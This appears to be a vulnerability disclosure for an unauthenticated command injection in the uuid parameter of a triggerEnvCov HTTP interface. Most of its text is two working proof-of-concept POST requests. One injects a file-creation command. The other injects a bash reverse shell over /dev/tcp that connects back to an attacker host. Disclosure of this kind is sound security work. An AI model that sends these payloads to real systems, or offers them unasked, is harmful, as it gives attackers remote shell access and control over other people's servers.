Unauthorized attackers can execute any command with triggerEnvCov Interface

[gaogaostone]

When accessing the triggerEnvCov Interface with special request, unauthorized attackers can execute any command on the target system. Attacker can inject command in the parameter uuid.

Proof of concept

Attacker can inject command in the parameter uuid.
1) The request with file creation and results are as following.

POST /cov/triggerEnvCov HTTP/1.1
Host: x.x.x.x:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 310


{
    "address":"127.0.0.1",
    "port":8899,
		"subModule":"/etc/passwd",
"uuid":"123 || touch /tmp/triggerEnvCov1 ||",
"gitUrl":"http://x.x.x.x:8080/root/haha.git",
"baseVersion":"7965193defdfb86692f6dfcf84f567b1c425f9e5",
"nowVersion":"fa8ffa7a44d469ee654e5b7a58bdb50539301f3d",
"type":"1"
}

2. The request with reverse shell is as following.

POST /cov/triggerEnvCov HTTP/1.1
Host: x.x.x.x:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 328


{
    "address":"127.0.0.1",
    "port":8899,
		"subModule":"/etc/passwd",
"uuid":"123 || bash -i >& /dev/tcp/x.x.x.x/9333 0>&1 ||",
"gitUrl":"http://x.x.x.x:8080/root/haha.git",
"baseVersion":"7965193defdfb86692f6dfcf84f567b1c425f9e5",
"nowVersion":"fa8ffa7a44d469ee654e5b7a58bdb50539301f3d",
"type":"1"
}